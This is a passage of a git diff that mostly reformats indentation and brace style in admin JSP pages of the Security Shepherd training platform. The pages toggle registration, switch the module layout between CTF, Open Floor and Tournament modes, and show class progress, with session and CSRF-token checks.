-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+	//Logging Username
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String ApplicationRoot = getServletContext().getRealPath("");
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String ApplicationRoot = getServletContext().getRealPath("");
 %>
 
 <div id="formDiv" class="post">
-    <h1 class="title">
-        <div id="displayTitle" style="display: inline;">
-            <% if (OpenRegistration.isEnabled()) { %>Close<% } else { %>Open<% } %>
-        </div>
-        Registration
-    </h1>
-    <div class="entry">
-        <form id="theForm" action="javascript:;">
-            <div id="toggleDiv">
-                <input type="hidden" id="csrfToken" value="<%= csrfToken %>"/>
-                <div id="closeDiv" <% if (!OpenRegistration.isEnabled()) {%>
-                     style="display: none;" <% } %>>
-                    <p>This function will close the registration functionality.
-                        This will prevent users from visiting registration pages and will
-                        block requests made to Registration Servlets.</p>
-                    <table align="center">
-                        <tr>
-                            <td colspan="2" align="center"><input type="submit"
-                                                                  id="submitButton" value="Close Registration"/></td>
-                        </tr>
-                    </table>
-                </div>
-                <div id="openDiv" <% if (OpenRegistration.isEnabled()) {%>
-                     style="display: none;" <% } %>>
-                    <p>This function will open the registration functionality.
-                        Users will have to refresh the login page to see the link pointing
-                        to the Shepherd registration page.</p>
-                    <table align="center">
-                        <tr>
-                            <td colspan="2" align="center"><input type="submit"
-                                                                  id="submitButton" value="Open Registration"/></td>
-                        </tr>
-                    </table>
-                </div>
-            </div>
-            <br/>
-            <div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
-            <div id="resultDiv" style="display: none;" class="informationBox"></div>
-            <div id="badData"></div>
-        </form>
-        <script>
-            $("#theForm").submit(function () {
-                //Get Data
-                var theCsrfToken = $('#csrfToken').val();
-                //Hide&Show Stuff
-                $("#loadingDiv").show("fast");
-                $("#badData").hide("fast");
-                $("#resultDiv").hide("fast");
-                $("#toggleDiv").slideUp("fast", function () {
-                    //The Ajax Operation
-                    var ajaxCall = $.ajax({
-                        type: "POST",
-                        url: "updateRegistration",
-                        data: {
-                            csrfToken: theCsrfToken
-                        },
-                        async: false
-                    });
-                    $("#loadingDiv").hide("fast", function () {
-                        if (ajaxCall.status == 200) {
-                            //Function Worked, Flip the Close/Open Menu
-                            console.log("Current State: " + $('#displayTitle').text());
-                            if ($('#displayTitle').text() == "Open") {
-                                console.log("Displaying Close Dialog");
-                                $("#closeDiv").show();
-                                $("#openDiv").hide();
-                                $("#displayTitle").fadeOut("fast", function () {
-                                    $("#displayTitle").text("Close");
-                                });
-                                $("#displayTitle").fadeIn("slow");
-                            } else {
-                                console.log("Displaying Open Dialog");
-                                $("#openDiv").show();
-                                $("#closeDiv").hide();
-                                $("#displayTitle").fadeOut("slow", function () {
-                                    $("#displayTitle").text("Open");
-                                });
-                                $("#displayTitle").fadeIn("slow");
-                            }
-                            //Now output Result Div and Show
-                            $("#resultDiv").html(ajaxCall.responseText);
-                            $("#resultDiv").show("fast");
-                        } else {
-                            $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                            $("#badData").show("slow");
-                        }
-                        $("#toggleDiv").slideDown("slow");
-                    });
-                });
-            });
-        </script>
-        <% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-        <% } %>
-    </div>
+	<h1 class="title">
+		<div id="displayTitle" style="display: inline;">
+			<% if (OpenRegistration.isEnabled()) { %>Close<% } else { %>Open<% } %>
+		</div>
+		Registration
+	</h1>
+	<div class="entry">
+		<form id="theForm" action="javascript:;">
+			<div id="toggleDiv">
+				<input type="hidden" id="csrfToken" value="<%= csrfToken %>" />
+				<div id="closeDiv" <% if (!OpenRegistration.isEnabled()) {%>
+					style="display: none;" <% } %>>
+					<p>This function will close the registration functionality.
+						This will prevent users from visiting registration pages and will
+						block requests made to Registration Servlets.</p>
+					<table align="center">
+						<tr>
+							<td colspan="2" align="center"><input type="submit"
+								id="submitButton" value="Close Registration" /></td>
+						</tr>
+					</table>
+				</div>
+				<div id="openDiv" <% if (OpenRegistration.isEnabled()) {%>
+					style="display: none;" <% } %>>
+					<p>This function will open the registration functionality.
+						Users will have to refresh the login page to see the link pointing
+						to the Shepherd registration page.</p>
+					<table align="center">
+						<tr>
+							<td colspan="2" align="center"><input type="submit"
+								id="submitButton" value="Open Registration" /></td>
+						</tr>
+					</table>
+				</div>
+			</div>
+			<br />
+			<div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
+			<div id="resultDiv" style="display: none;" class="informationBox"></div>
+			<div id="badData"></div>
+		</form>
+		<script>					
+				$("#theForm").submit(function(){
+					//Get Data
+					var theCsrfToken = $('#csrfToken').val();
+					//Hide&Show Stuff
+					$("#loadingDiv").show("fast");
+					$("#badData").hide("fast");
+					$("#resultDiv").hide("fast");
+					$("#toggleDiv").slideUp("fast", function(){
+						//The Ajax Operation
+						var ajaxCall = $.ajax({
+							type: "POST",
+							url: "updateRegistration",
+							data: {
+								csrfToken: theCsrfToken
+							},
+							async: false
+						});
+						$("#loadingDiv").hide("fast", function(){
+							if(ajaxCall.status == 200)
+							{
+								//Function Worked, Flip the Close/Open Menu
+								console.log("Current State: " + $('#displayTitle').text());
+								if($('#displayTitle').text() == "Open"){
+									console.log("Displaying Close Dialog");
+									$("#closeDiv").show();
+									$("#openDiv").hide();
+									$("#displayTitle").fadeOut("fast", function(){
+										$("#displayTitle").text("Close");
+									});
+									$("#displayTitle").fadeIn("slow");
+								}
+								else {
+									console.log("Displaying Open Dialog");
+									$("#openDiv").show();
+									$("#closeDiv").hide();
+									$("#displayTitle").fadeOut("slow", function(){
+										$("#displayTitle").text("Open");
+									});
+									$("#displayTitle").fadeIn("slow");
+								}
+								//Now output Result Div and Show
+								$("#resultDiv").html(ajaxCall.responseText);
+								$("#resultDiv").show("fast");
+							}
+							else
+							{
+								$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+								$("#badData").show("slow");
+							}
+							$("#toggleDiv").slideDown("slow");
+						});
+					});
+				});
+			</script>
+		<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+		<% } %>
+	</div>
 </div>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/moduleManagement/changeLevelLayout.jsp b/src/main/webapp/admin/moduleManagement/changeLevelLayout.jsp
index fc17edfbc..e26be00c8 100644
--- a/src/main/webapp/admin/moduleManagement/changeLevelLayout.jsp
+++ b/src/main/webapp/admin/moduleManagement/changeLevelLayout.jsp
@@ -1,272 +1,284 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: changeLevelLayout.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: changeLevelLayout.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) //Session If
-    {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(changeLevelLayout.jsp): tokenCookie Error:" + htmlE.toString());
-        }
-        // validateAdminSession ensures a valid session, and valid administrator credentials
-        // Also, if tokenCookie != null, then the page is good to continue loading
-        // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
-            //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+ 
+if (request.getSession() != null) //Session If
+{
+	HttpSession ses = request.getSession();
+	Getter get = new Getter();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(changeLevelLayout.jsp): tokenCookie Error:" + htmlE.toString());
+	}
+	// validateAdminSession ensures a valid session, and valid administrator credentials
+	// Also, if tokenCookie != null, then the page is good to continue loading
+	// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
+	Object tokenParmeter = request.getParameter("csrfToken");
+	if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+	{
+		//Logging Username
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+		// Getting Session Variables
+		//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+		
+		String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
 %>
 <div id="formDiv" class="post">
-    <h1 class="title">
-        Current Mode:
-        <div id="currentModeTitle" style="display: inline;"><%= ModulePlan.currentMode() %>
-        </div>
-    </h1>
-    <div class="entry">
-        <p>You can change the layout in which modules are presented to
-            players. Use the following functions to change the current Shepherd
-            Mode.</p>
-        <div id="resultDiv" style="display: none" class="informationBox"></div>
-        <div id="badData" style="display: none"></div>
-
-        <!-- CTF Mode Section -->
-        <div id="ctfDiv" <% if (ModulePlan.isIncrementalFloor()) { %>
-             style="display: none;" <% } %>>
-            <h2 class="title">Enable CTF Mode</h2>
-            <p>When Shepherd has been deployed in the CTF mode, a user can
-                only access one uncompleted module at a time. The first module
-                presented to the user is the easiest in Security Shepherd, which has
-                not been marked as closed by the administrator. The levels increase
-                slowly in difficulty and jump from one topic to another. This layout
-                is the recommended setting when using Security Shepherd for a
-                competitive training scenario.</p>
-            <a href="javascript:;" style="text-decoration: none;"
-               id="enableCtfMode" title="Enable CTF Mode">
-                <div class="menuButton">Enable CTF Mode</div>
-            </a>
-        </div>
-        <div id="ctfLoadingDiv" style="display: none;" class="menuButton">Loading...</div>
-        <br>
+	<h1 class="title">
+		Current Mode:
+		<div id="currentModeTitle" style="display: inline;"><%= ModulePlan.currentMode() %></div>
+	</h1>
+	<div class="entry">
+		<p>You can change the layout in which modules are presented to
+			players. Use the following functions to change the current Shepherd
+			Mode.</p>
+		<div id="resultDiv" style="display: none" class="informationBox"></div>
+		<div id="badData" style="display: none"></div>
 
-        <!-- Open Floor Mode Section -->
-        <div id="openFloor" <% if (ModulePlan.isOpenFloor()) { %>
-             style="display: none;" <% } %>>
-            <h2 class="title">Enable Open Floor Mode</h2>
-            <p>When Shepherd has been deployed in the Open Floor mode, a user
-                can access any level that is marked as open by the admin. Modules
-                are sorted into their Security Risk Categories, and the lessons are
-                presented first. This layout is ideal for users wishing to explore
-                security risks.</p>
-            <a href="javascript:;" style="text-decoration: none;"
-               id="enableOpenFloorMode" title="Enable Open Floor Mode">
-                <div class="menuButton">Enable Open Floor Mode</div>
-            </a>
-        </div>
-        <div id="openFloorLoadingDiv" style="display: none;"
-             class="menuButton">Loading...
-        </div>
-        <br>
+		<!-- CTF Mode Section -->
+		<div id="ctfDiv" <% if(ModulePlan.isIncrementalFloor()) { %>
+			style="display: none;" <% } %>>
+			<h2 class="title">Enable CTF Mode</h2>
+			<p>When Shepherd has been deployed in the CTF mode, a user can
+				only access one uncompleted module at a time. The first module
+				presented to the user is the easiest in Security Shepherd, which has
+				not been marked as closed by the administrator. The levels increase
+				slowly in difficulty and jump from one topic to another. This layout
+				is the recommended setting when using Security Shepherd for a
+				competitive training scenario.</p>
+			<a href="javascript:;" style="text-decoration: none;"
+				id="enableCtfMode" title="Enable CTF Mode">
+				<div class="menuButton">Enable CTF Mode</div>
+			</a>
+		</div>
+		<div id="ctfLoadingDiv" style="display: none;" class="menuButton">Loading...</div>
+		<br>
 
-        <!-- Tournament Mode Section -->
-        <div id="tournament" <%if (ModulePlan.isTournamentFloor()) {%>
-             style="display: none;" <% } %>>
-            <h2 class="title">Enable Tournament Mode</h2>
-            <p>When Shepherd has been deployed in the Tournament Mode, a user
-                can access any level that is marked as open by the admin. Modules
-                are sorted into difficulty bands, from least to most difficult. This
-                layout is ideal when Shepherd is being utilised as an open
-                application security competition.</p>
-            <a href="javascript:;" style="text-decoration: none;"
-               id="enableTournamentMode" title="Enable Tournament Mode">
-                <div class="menuButton">Enable Tournament Mode</div>
-            </a>
-        </div>
-        <div id="tournamentLoadingDiv" style="display: none;"
-             class="menuButton">Loading...
-        </div>
-        <br>
-        <script>
-            var theCsrfToken = "<%= csrfToken %>";
-            var theRefreshError = "Could not Refresh Menu";
+		<!-- Open Floor Mode Section -->
+		<div id="openFloor" <% if(ModulePlan.isOpenFloor()) { %>
+			style="display: none;" <% } %>>
+			<h2 class="title">Enable Open Floor Mode</h2>
+			<p>When Shepherd has been deployed in the Open Floor mode, a user
+				can access any level that is marked as open by the admin. Modules
+				are sorted into their Security Risk Categories, and the lessons are
+				presented first. This layout is ideal for users wishing to explore
+				security risks.</p>
+			<a href="javascript:;" style="text-decoration: none;"
+				id="enableOpenFloorMode" title="Enable Open Floor Mode">
+				<div class="menuButton">Enable Open Floor Mode</div>
+			</a>
+		</div>
+		<div id="openFloorLoadingDiv" style="display: none;"
+			class="menuButton">Loading...</div>
+		<br>
 
-            $("#enableCtfMode").click(function () {
-                $("#ctfLoadingDiv").show("fast");
-                $("#badData").hide("fast");
-                $("#resultDiv").hide("fast");
-                //The Ajax Operation
-                $("#ctfDiv").slideUp("fast", function () {
-                    var ajaxCall = $.ajax({
-                        type: "POST",
-                        url: "setCtfMode",
-                        data: {
-                            csrfToken: theCsrfToken
-                        },
-                        async: false
-                    });
-                    $("#ctfLoadingDiv").hide("fast", function () {
-                        //$("#ctfDiv").show("slow"); //Commented out because I like the way The Option is gone after it has been clicked
-                        if (ajaxCall.status == 200) {
-                            //Dont Show this Div, Show Others
-                            console.log("Hiding CTF Menu, Showing Others");
-                            //$("#ctfDiv").slideDown("slow");
-                            $("#openFloor").slideDown("slow");
-                            $("#tournament").slideDown("slow");
-                            //Relist Current mode
-                            $("#currentModeTitle").fadeOut("slow", function () {
-                                $("#currentModeTitle").text("CTF");
-                            });
-                            $("#currentModeTitle").fadeIn("slow");
-                            //Show Results
-                            $("#resultDiv").html(ajaxCall.responseText);
-                            $("#resultDiv").show("fast");
-                        } else {
-                            $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                            $("#badData").show("slow");
-                            $("#ctfDiv").slideDown("slow");
-                        }
-                        var scrollTo = $("#currentModeTitle").offset().top;
-                        scrollTo = scrollTo - 60;
-                        $('html, body').animate({
-                            scrollTop: scrollTo
-                        }, 1000);
-                    });
-                    //Refresh the Side Menu
-                    refreshSideMenu(theCsrfToken, theRefreshError);
-                });
-            });
-
-            $("#enableOpenFloorMode").click(function () {
-                $("#openFloorLoadingDiv").show("fast");
-                $("#badData").hide("fast");
-                $("#resultDiv").hide("fast");
-                //The Ajax Operation
-                $("#openFloor").slideUp("fast", function () {
-                    var ajaxCall = $.ajax({
-                        type: "POST",
-                        url: "openFloorModules",
-                        data: {
-                            csrfToken: theCsrfToken
-                        },
-                        async: false
-                    });
-                    $("#openFloorLoadingDiv").hide("fast", function () {
-                        if (ajaxCall.status == 200) {
-                            //Dont Show this Div, Show Others
-                            console.log("Hiding Open Floor Menu, Showing Others");
-                            $("#ctfDiv").slideDown("slow");
-                            //$("#openFloor").slideDown("slow");
-                            $("#tournament").slideDown("slow");
-                            //Relist Current mode
-                            $("#currentModeTitle").fadeOut("slow", function () {
-                                $("#currentModeTitle").text("Open Floor");
-                            });
-                            $("#currentModeTitle").fadeIn("slow");
-                            //Show Results
-                            $("#resultDiv").html(ajaxCall.responseText);
-                            $("#resultDiv").show("fast");
-                        } else {
-                            $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                            $("#badData").show("slow");
-                            $("#openFloor").slideDown("slow");
-                        }
-                        var scrollTo = $("#currentModeTitle").offset().top;
-                        scrollTo = scrollTo - 60;
-                        $('html, body').animate({
-                            scrollTop: scrollTo
-                        }, 1000);
-                    });
-                    //Refresh the Side Menu
-                    refreshSideMenu(theCsrfToken, theRefreshError);
-                });
-            });
-
-            $("#enableTournamentMode").click(function () {
-                $("#tournamentLoadingDiv").show("fast");
-                $("#badData").hide("fast");
-                $("#resultDiv").hide("fast");
-                //The Ajax Operation
-                $("#tournament").slideUp("fast", function () {
-                    var ajaxCall = $.ajax({
-                        type: "POST",
-                        url: "tournamentModeModules",
-                        data: {
-                            csrfToken: theCsrfToken
-                        },
-                        async: false
-                    });
-                    $("#tournamentLoadingDiv").hide("fast", function () {
-                        if (ajaxCall.status == 200) {
-                            //Dont Show this Div, Show Others
-                            console.log("Hiding Tournament Menu, Showing Others");
-                            $("#ctfDiv").slideDown("slow");
-                            $("#openFloor").slideDown("slow");
-                            //$("#tournament").slideDown("slow");
-                            //Relist Current mode
-                            $("#currentModeTitle").fadeOut("slow", function () {
-                                $("#currentModeTitle").text("Tournament");
-                            });
-                            $("#currentModeTitle").fadeIn("slow");
-                            //Show Results
-                            $("#resultDiv").html(ajaxCall.responseText);
-                            $("#resultDiv").show("fast");
-                        } else {
-                            $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                            $("#badData").show("slow");
-                            $("#tournament").slideDown("slow");
-                        }
-                        var scrollTo = $("#currentModeTitle").offset().top;
-                        scrollTo = scrollTo - 60;
-                        $('html, body').animate({
-                            scrollTop: scrollTo
-                        }, 1000);
-                    });
-                    //Refresh the Side Menu
-                    refreshSideMenu(theCsrfToken, theRefreshError);
-                });
-            });
-        </script>
-        <% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-        <% } %>
-    </div>
+		<!-- Tournament Mode Section -->
+		<div id="tournament" <%if(ModulePlan.isTournamentFloor()) {%>
+			style="display: none;" <% } %>>
+			<h2 class="title">Enable Tournament Mode</h2>
+			<p>When Shepherd has been deployed in the Tournament Mode, a user
+				can access any level that is marked as open by the admin. Modules
+				are sorted into difficulty bands, from least to most difficult. This
+				layout is ideal when Shepherd is being utilised as an open
+				application security competition.</p>
+			<a href="javascript:;" style="text-decoration: none;"
+				id="enableTournamentMode" title="Enable Tournament Mode">
+				<div class="menuButton">Enable Tournament Mode</div>
+			</a>
+		</div>
+		<div id="tournamentLoadingDiv" style="display: none;"
+			class="menuButton">Loading...</div>
+		<br>
+		<script>
+					var theCsrfToken = "<%= csrfToken %>";
+					var theRefreshError = "Could not Refresh Menu";
+					
+					$("#enableCtfMode").click(function(){
+						$("#ctfLoadingDiv").show("fast");
+						$("#badData").hide("fast");
+						$("#resultDiv").hide("fast");
+						//The Ajax Operation
+						$("#ctfDiv").slideUp("fast", function(){
+							var ajaxCall = $.ajax({
+								type: "POST",
+								url: "setCtfMode",
+								data: {
+									csrfToken: theCsrfToken
+								},
+								async: false
+							});
+							$("#ctfLoadingDiv").hide("fast", function(){
+								//$("#ctfDiv").show("slow"); //Commented out because I like the way The Option is gone after it has been clicked
+								if(ajaxCall.status == 200)
+								{
+									//Dont Show this Div, Show Others
+									console.log("Hiding CTF Menu, Showing Others");
+									//$("#ctfDiv").slideDown("slow");
+									$("#openFloor").slideDown("slow");
+									$("#tournament").slideDown("slow");
+									//Relist Current mode
+									$("#currentModeTitle").fadeOut("slow", function(){
+										$("#currentModeTitle").text("CTF");
+									});
+									$("#currentModeTitle").fadeIn("slow");
+									//Show Results
+									$("#resultDiv").html(ajaxCall.responseText);
+									$("#resultDiv").show("fast");
+								}
+								else
+								{
+									$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+									$("#badData").show("slow");
+									$("#ctfDiv").slideDown("slow");
+								}
+								var scrollTo = $("#currentModeTitle").offset().top;
+								scrollTo = scrollTo - 60;
+								$('html, body').animate({
+							        scrollTop: scrollTo
+							    }, 1000);
+							});
+							//Refresh the Side Menu
+							refreshSideMenu(theCsrfToken, theRefreshError);
+						});
+					});
+					
+					$("#enableOpenFloorMode").click(function(){
+						$("#openFloorLoadingDiv").show("fast");
+						$("#badData").hide("fast");
+						$("#resultDiv").hide("fast");
+						//The Ajax Operation
+						$("#openFloor").slideUp("fast", function(){
+							var ajaxCall = $.ajax({
+								type: "POST",
+								url: "openFloorModules",
+								data: {
+									csrfToken: theCsrfToken
+								},
+								async: false
+							});
+							$("#openFloorLoadingDiv").hide("fast", function(){
+								if(ajaxCall.status == 200)
+								{
+									//Dont Show this Div, Show Others
+									console.log("Hiding Open Floor Menu, Showing Others");
+									$("#ctfDiv").slideDown("slow");
+									//$("#openFloor").slideDown("slow");
+									$("#tournament").slideDown("slow");
+									//Relist Current mode
+									$("#currentModeTitle").fadeOut("slow", function(){
+										$("#currentModeTitle").text("Open Floor");
+									});
+									$("#currentModeTitle").fadeIn("slow");
+									//Show Results
+									$("#resultDiv").html(ajaxCall.responseText);
+									$("#resultDiv").show("fast");
+								}
+								else
+								{
+									$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+									$("#badData").show("slow");
+									$("#openFloor").slideDown("slow");
+								}
+								var scrollTo = $("#currentModeTitle").offset().top;
+								scrollTo = scrollTo - 60;
+								$('html, body').animate({
+							        scrollTop: scrollTo
+							    }, 1000);
+							});
+							//Refresh the Side Menu
+							refreshSideMenu(theCsrfToken, theRefreshError);
+						});
+					});
+					
+					$("#enableTournamentMode").click(function(){
+						$("#tournamentLoadingDiv").show("fast");
+						$("#badData").hide("fast");
+						$("#resultDiv").hide("fast");
+						//The Ajax Operation
+						$("#tournament").slideUp("fast", function(){
+							var ajaxCall = $.ajax({
+								type: "POST",
+								url: "tournamentModeModules",
+								data: {
+									csrfToken: theCsrfToken
+								},
+								async: false
+							});
+							$("#tournamentLoadingDiv").hide("fast", function(){
+								if(ajaxCall.status == 200)
+								{
+									//Dont Show this Div, Show Others
+									console.log("Hiding Tournament Menu, Showing Others");
+									$("#ctfDiv").slideDown("slow");
+									$("#openFloor").slideDown("slow");
+									//$("#tournament").slideDown("slow");
+									//Relist Current mode
+									$("#currentModeTitle").fadeOut("slow", function(){
+										$("#currentModeTitle").text("Tournament");
+									});
+									$("#currentModeTitle").fadeIn("slow");
+									//Show Results
+									$("#resultDiv").html(ajaxCall.responseText);
+									$("#resultDiv").show("fast");
+								}
+								else
+								{
+									$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+									$("#badData").show("slow");
+									$("#tournament").slideDown("slow");
+								}	
+								var scrollTo = $("#currentModeTitle").offset().top;
+								scrollTo = scrollTo - 60;
+								$('html, body').animate({
+							        scrollTop: scrollTo
+							    }, 1000);
+							});
+							//Refresh the Side Menu
+							refreshSideMenu(theCsrfToken, theRefreshError);
+						});
+					});
+					</script>
+		<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+		<% } %>
+	</div>
 </div>
-<%
-        } //Valid Session If
-        else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } //Session If
-    else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+<% 
+	} //Valid Session If
+	else
+	{
+	response.sendRedirect("../../loggedOutSheep.html");
+	}
+} //Session If
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/admin/moduleManagement/classProgress.jsp b/src/main/webapp/admin/moduleManagement/classProgress.jsp
index 33724b937..bd332af87 100644
--- a/src/main/webapp/admin/moduleManagement/classProgress.jsp
+++ b/src/main/webapp/admin/moduleManagement/classProgress.jsp
@@ -1,145 +1,164 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: classProgress.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: classProgress.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(classProgress.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(classProgress.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
-            //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+	//Logging Username
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String ApplicationRoot = getServletContext().getRealPath("");
-            ResultSet classList = Getter.getClassInfo(ApplicationRoot);
-            boolean showClasses = true;
-            try {
-                showClasses = classList.next();
-            } catch (SQLException e) {
-                ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
-                showClasses = false;
-            }
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String ApplicationRoot = getServletContext().getRealPath("");
+ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+boolean showClasses = true;
+try
+{
+	showClasses = classList.next();
+}
+catch(SQLException e)
+{
